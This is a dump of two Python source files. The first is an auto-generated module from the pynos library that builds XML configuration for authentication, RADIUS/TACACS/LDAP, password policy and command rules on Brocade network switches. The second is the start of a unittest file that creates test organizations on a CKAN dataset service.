callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_protocol(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
protocol = ET.SubElement(host, "protocol")
protocol.text = kwargs.pop('protocol')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_key(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
key = ET.SubElement(host, "key")
key.text = kwargs.pop('key')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_encryption_level(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
encryption_level = ET.SubElement(host, "encryption-level")
encryption_level.text = kwargs.pop('encryption_level')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
port = ET.SubElement(host, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_protocol(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
protocol = ET.SubElement(host, "protocol")
protocol.text = kwargs.pop('protocol')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_key(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
key = ET.SubElement(host, "key")
key.text = kwargs.pop('key')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_encryption_level(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
encryption_level = ET.SubElement(host, "encryption-level")
encryption_level.text = kwargs.pop('encryption_level')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_tacacs_source_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
tacacs_source_ip = ET.SubElement(tacacs_server, "tacacs-source-ip")
tacacs_source_ip.text = kwargs.pop('tacacs_source_ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
port = ET.SubElement(host, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_basedn(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
basedn = ET.SubElement(host, "basedn")
basedn.text = kwargs.pop('basedn')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_maprole_group_ad_group(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
maprole = ET.SubElement(ldap_server, "maprole")
group = ET.SubElement(maprole, "group")
ad_group = ET.SubElement(group, "ad-group")
ad_group.text = kwargs.pop('ad_group')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_maprole_group_switch_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
maprole = ET.SubElement(ldap_server, "maprole")
group = ET.SubElement(maprole, "group")
ad_group_key = ET.SubElement(group, "ad-group")
ad_group_key.text = kwargs.pop('ad_group')
switch_role = ET.SubElement(group, "switch-role")
switch_role.text = kwargs.pop('switch_role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_min_length(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
min_length = ET.SubElement(password_attributes, "min-length")
min_length.text = kwargs.pop('min_length')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_max_retry(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
max_retry = ET.SubElement(password_attributes, "max-retry")
max_retry.text = kwargs.pop('max_retry')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_max_lockout_duration(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
max_lockout_duration = ET.SubElement(password_attributes, "max-lockout-duration")
max_lockout_duration.text = kwargs.pop('max_lockout_duration')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
upper = ET.SubElement(character_restriction, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
lower = ET.SubElement(character_restriction, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_numeric(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
numeric = ET.SubElement(character_restriction, "numeric")
numeric.text = kwargs.pop('numeric')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_special_char(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
special_char = ET.SubElement(character_restriction, "special-char")
special_char.text = kwargs.pop('special_char')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_admin_lockout_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
admin_lockout_enable = ET.SubElement(password_attributes, "admin-lockout-enable")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_login(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
login = ET.SubElement(banner, "login")
login.text = kwargs.pop('login')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_motd(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
motd = ET.SubElement(banner, "motd")
motd.text = kwargs.pop('motd')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_incoming(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
incoming = ET.SubElement(banner, "incoming")
incoming.text = kwargs.pop('incoming')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_index(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index = ET.SubElement(rule, "index")
index.text = kwargs.pop('index')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
action = ET.SubElement(rule, "action")
action.text = kwargs.pop('action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_operation(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
operation = ET.SubElement(rule, "operation")
operation.text = kwargs.pop('operation')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
role = ET.SubElement(rule, "role")
role.text = kwargs.pop('role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_container_cmds_enumList(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
container_cmds = ET.SubElement(cmdlist, "container-cmds")
enumList = ET.SubElement(container_cmds, "enumList")
enumList.text = kwargs.pop('enumList')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_d_interface_fcoe_leaf_interface_fcoe_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_d = ET.SubElement(cmdlist, "interface-d")
interface_fcoe_leaf = ET.SubElement(interface_d, "interface-fcoe-leaf")
interface = ET.SubElement(interface_fcoe_leaf, "interface")
fcoe_leaf = ET.SubElement(interface, "fcoe-leaf")
fcoe_leaf.text = kwargs.pop('fcoe_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_e_interface_te_leaf_interface_tengigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_e = ET.SubElement(cmdlist, "interface-e")
interface_te_leaf = ET.SubElement(interface_e, "interface-te-leaf")
interface = ET.SubElement(interface_te_leaf, "interface")
tengigabitethernet_leaf = ET.SubElement(interface, "tengigabitethernet-leaf")
tengigabitethernet_leaf.text = kwargs.pop('tengigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_h_interface_ge_leaf_interface_gigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_h = ET.SubElement(cmdlist, "interface-h")
interface_ge_leaf = ET.SubElement(interface_h, "interface-ge-leaf")
interface = ET.SubElement(interface_ge_leaf, "interface")
gigabitethernet_leaf = ET.SubElement(interface, "gigabitethernet-leaf")
gigabitethernet_leaf.text = kwargs.pop('gigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_j_interface_pc_leaf_interface_port_channel_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_j = ET.SubElement(cmdlist, "interface-j")
interface_pc_leaf = ET.SubElement(interface_j, "interface-pc-leaf")
interface = ET.SubElement(interface_pc_leaf, "interface")
port_channel_leaf = ET.SubElement(interface, "port-channel-leaf")
port_channel_leaf.text = kwargs.pop('port_channel_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_l_interface_vlan_leaf_interface_vlan_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_l = ET.SubElement(cmdlist, "interface-l")
interface_vlan_leaf = ET.SubElement(interface_l, "interface-vlan-leaf")
interface = ET.SubElement(interface_vlan_leaf, "interface")
vlan_leaf = ET.SubElement(interface, "vlan-leaf")
vlan_leaf.text = kwargs.pop('vlan_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_m_interface_management_leaf_interface_management_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_m = ET.SubElement(cmdlist, "interface-m")
interface_management_leaf = ET.SubElement(interface_m, "interface-management-leaf")
interface = ET.SubElement(interface_management_leaf, "interface")
management_leaf = ET.SubElement(interface, "management-leaf")
management_leaf.text = kwargs.pop('management_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_o_interface_loopback_leaf_interface_loopback_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_o = ET.SubElement(cmdlist, "interface-o")
interface_loopback_leaf = ET.SubElement(interface_o, "interface-loopback-leaf")
interface = ET.SubElement(interface_loopback_leaf, "interface")
loopback_leaf = ET.SubElement(interface, "loopback-leaf")
loopback_leaf.text = kwargs.pop('loopback_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_q_interface_ve_leaf_interface_ve_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_q = ET.SubElement(cmdlist, "interface-q")
interface_ve_leaf = ET.SubElement(interface_q, "interface-ve-leaf")
interface = ET.SubElement(interface_ve_leaf, "interface")
ve_leaf = ET.SubElement(interface, "ve-leaf")
ve_leaf.text = kwargs.pop('ve_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_s_interface_fc_leaf_interface_fibrechannel_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_s = ET.SubElement(cmdlist, "interface-s")
interface_fc_leaf = ET.SubElement(interface_s, "interface-fc-leaf")
interface = ET.SubElement(interface_fc_leaf, "interface")
fibrechannel_leaf = ET.SubElement(interface, "fibrechannel-leaf")
fibrechannel_leaf.text = kwargs.pop('fibrechannel_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_u_interface_fe_leaf_interface_fortygigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_u = ET.SubElement(cmdlist, "interface-u")
interface_fe_leaf = ET.SubElement(interface_u, "interface-fe-leaf")
interface = ET.SubElement(interface_fe_leaf, "interface")
fortygigabitethernet_leaf = ET.SubElement(interface, "fortygigabitethernet-leaf")
fortygigabitethernet_leaf.text = kwargs.pop('fortygigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_w_interface_he_leaf_interface_hundredgigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_w = ET.SubElement(cmdlist, "interface-w")
interface_he_leaf = ET.SubElement(interface_w, "interface-he-leaf")
interface = ET.SubElement(interface_he_leaf, "interface")
hundredgigabitethernet_leaf = ET.SubElement(interface, "hundredgigabitethernet-leaf")
hundredgigabitethernet_leaf.text = kwargs.pop('hundredgigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def root_sa_root_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
root_sa = ET.SubElement(config, "root-sa", xmlns="urn:brocade.com:mgmt:brocade-aaa")
root = ET.SubElement(root_sa, "root")
enable = ET.SubElement(root, "enable")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def root_sa_root_access(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
root_sa = ET.SubElement(config, "root-sa", xmlns="urn:brocade.com:mgmt:brocade-aaa")
root = ET.SubElement(root_sa, "root")
access = ET.SubElement(root, "access")
access.text = kwargs.pop('access')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_alias_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
alias = ET.SubElement(alias_config, "alias")
name = ET.SubElement(alias, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_alias_expansion(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
alias = ET.SubElement(alias_config, "alias")
name_key = ET.SubElement(alias, "name")
name_key.text = kwargs.pop('name')
expansion = ET.SubElement(alias, "expansion")
expansion.text = kwargs.pop('expansion')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name = ET.SubElement(user, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_alias_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name_key = ET.SubElement(user, "name")
name_key.text = kwargs.pop('name')
alias = ET.SubElement(user, "alias")
name = ET.SubElement(alias, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_alias_expansion(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name_key = ET.SubElement(user, "name")
name_key.text = kwargs.pop('name')
alias = ET.SubElement(user, "alias")
name_key = ET.SubElement(alias, "name")
name_key.text = kwargs.pop('name')
expansion = ET.SubElement(alias, "expansion")
expansion.text = kwargs.pop('expansion')
callback = kwargs.pop('callback', self._callback)
return callback(config)
| BRCDcomm/pynos | pynos/versions/ver_7/ver_7_0_0/yang/brocade_aaa.py | Python | apache-2.0 | 91,486 |
import os
import random
import string
import unittest
import requests
from tethys_dataset_services.engines import CkanDatasetEngine
try:
from tethys_dataset_services.tests.test_config import TEST_CKAN_DATASET_SERVICE
except ImportError:
print('ERROR: To perform tests, you must create a file in the "tests" package called "test_config.py". In this file'
'provide a dictionary called "TEST_CKAN_DATASET_SERVICE" with keys "API_ENDPOINT" and "APIKEY".')
exit(1)
def random_string_generator(size):
chars = string.ascii_lowercase + string.digits
return ''.join(random.choice(chars) for _ in range(size))
class TestCkanDatasetEngine(unittest.TestCase):
def setUp(self):
# Auth
self.endpoint = TEST_CKAN_DATASET_SERVICE['ENDPOINT']
self.apikey = TEST_CKAN_DATASET_SERVICE['APIKEY']
self.username = TEST_CKAN_DATASET_SERVICE['USERNAME']
# Files
self.tests_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
self.files_root = os.path.join(self.tests_root, 'files')
self.support_root = os.path.join(self.tests_root, 'support')
# Create Test Engine
self.engine = CkanDatasetEngine(endpoint=self.endpoint,
apikey=self.apikey)
# Create Test Organization
self.test_org = random_string_generator(10)
data_dict = {
'name': self.test_org,
'users': [{'name': self.username}]
}
url, data, headers = self.engine._prepare_request(
'organization_create', data_dict=data_dict, apikey=self.apikey
)
status_code, response_text = self.engine._execute_request(url, data, headers)
if status_code != 200:
raise requests.RequestException('Unable to create group: {}'.format(response_text))
# Create Test Dataset
self.test_dataset_name = random_string_generator(10)
